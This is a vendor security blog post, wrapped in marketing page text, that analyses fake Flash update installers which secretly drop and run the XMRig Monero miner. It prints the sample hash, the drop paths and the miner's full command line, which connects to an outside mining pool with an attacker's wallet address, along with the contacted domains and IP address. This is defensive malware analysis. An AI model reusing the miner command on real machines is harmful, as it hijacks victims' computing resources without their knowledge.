Converged security and networking to securely connect any user, device, or site to any workload or application.

Versa Secure Access Fabric Versa Zero Trust Everywhere Versa Titan Versa SASE Architecture Versa AI
SASE ROI Calculator

SASE can save your company a lot of money. Use the industry’s-first SASE ROI calculator to quantify the cost savings you can achieve in services, asset consolidation, and labor when deploying Versa SASE.

Top Energy Firm Achieves Comprehensive “Work-From-Anywhere” with Versa SASE

A large, publicly traded energy company operating in all areas of the oil and gas industry has dramatically simplified their network stack and realized huge cost savings with Versa SASE.

 
Availability and Buying Options in the Emerging SASE Market

EMA evaluates the different SASE vendors and their approaches to architecture, go-to-market, and support for their cloud-delivered and hybrid services.

Gartner Magic Quadrant for WAN Edge Infrastructure

Gartner Magic Quadrant report analyzes the various vendors in the WAN edge market and Versa is positioned as a Leader.

Versa Networks - Explained in 1 minute

Learn about the Versa Secure SD-WAN solution in a high-level, one minute overview.

Versa SASE (Secure Access Service Edge)

SASE is the simplest, most scalable way to continuously secure and connect the millions points of access in and out of the corporate resources regardless of location.

 
Versa Secure SD-WAN – Simple, Secure, and Reliable Branch to Multi-Cloud Connectivity

Versa Secure SD-WAN is a single software platform that offers multi-layered security and enables multi-cloud connectivity for Enterprises.

The Versa Networks Blog

Research Lab

Fake Flash Updates Mine Monero Under the Hood

versa-staff
By Versa Staff
Versa Networks
October 25, 2018

The recent surge in cryptomining is providing cyber criminals with more vectors to attack, at the expense of legitimate users. This year has seen a huge increase in the deployment of numerous malwares, with cryptominers as primary or secondary payloads. Cryptominers are becoming easy targets, that allow attackers to go a step further to disguise themselves as the miner in the form of a flash update. Palo Alto Networks reported a list of collected samples, some dating back to August 2018[1]. The author further adds that installers from the Adobe website were legitimate, and the malicious ones were mostly Windows binaries. There were many previous attempts to pass off malware as Flash updates, but in this current scenario, some of the samples perform a legitimate flash update, along with dropping the Monero miner executable, executing it without user knowledge.

On running the flash update executable a22b50d4f18b2fc92bdcffc01281c40cd4ed1d2bd9364fce91ea484a37bf3725, it shows a typical warning, “Do you want to allow the following program from an unknown publisher to make changes to this computer?”, which is dismissed by most. When we accept to continue, it executes and drops two files in the path %appdata%\Roaming\xbooster\Manager.exe and %appdata%\Roaming\xbooster\xmrig.exe, and also runs the xmrig.exe. The task manager shows the process xmrig.exe running with CPU utilization at above 90%.

Looking at the processes created at the execution xmrig.exe, the process is created from the execution of the command “C:\Users\<USER>\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2 -p x –donate-level=1 -B –max-cpu-usage=90 -t 1”.

The executable extracts resources into the temp folder and writes that to xmrig.exe and Manager.exe. Then xmrig.exe establishes a connection with the mining pool and executes in the background.

On analysis of the packet capture showing execution, the executable does a DNS query for “ztracker.xyz”, as well as “xmr-eu1.nanopool.org”. The domain name is resolved to a number of IP addresses of which the system establishes a TCP connection with 5.196.23.240 over port 14444. All further communication recorded by the xmrig.exe is only to port 14444.

Following the TCP stream of the connection shows it trying to connect with the XMRig with the login parameters “4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh”, that indicates the cryptowallet in which the mined coins will be collected. As per the definitions of the json format for xmrig executable[2], we understand the first exchange is a login request to a mining pool, the second json exchange represents the success reply to the login process. The last exchange contains ”method : job”, which indicate the new jobs to send the miner. The executable also contains placeholder strings for the submit request, as well as the reply to the keepalive requests. The submit request will probably be sent once the miner solves the challenge to get the hash to be communicated for verification, and for collecting the mined coins.

Cryptominers, if installed without the knowledge of user in a system, might usually be detected  by slow systems performance. Many end users might not be able to immediately pinpoint the issue. Campaigns such as this, that inject miners alongside legitimate updates, need to be monitored and prevented. Though it might not be openly malicious, it will still degrade the system performance. Versa VOS™ (formerly FlexVNF) antivirus module detects malicious executables and prevents them from being downloaded onto the system.

References

[1] https://researchcenter.paloaltonetworks.com/2018/10/unit42-fake-flash-updaters-push-cryptocurrency-miners/

[2] https://github.com/xmrig/xmrig-proxy/blob/master/doc/STRATUM.md


Topics





Recent Posts








Top Tags



Gartner Magic Quadrant for WAN Edge Infrastructure

Gartner Magic Quadrant report analyzes the various vendors in the WAN edge market and Versa is positioned as a Leader.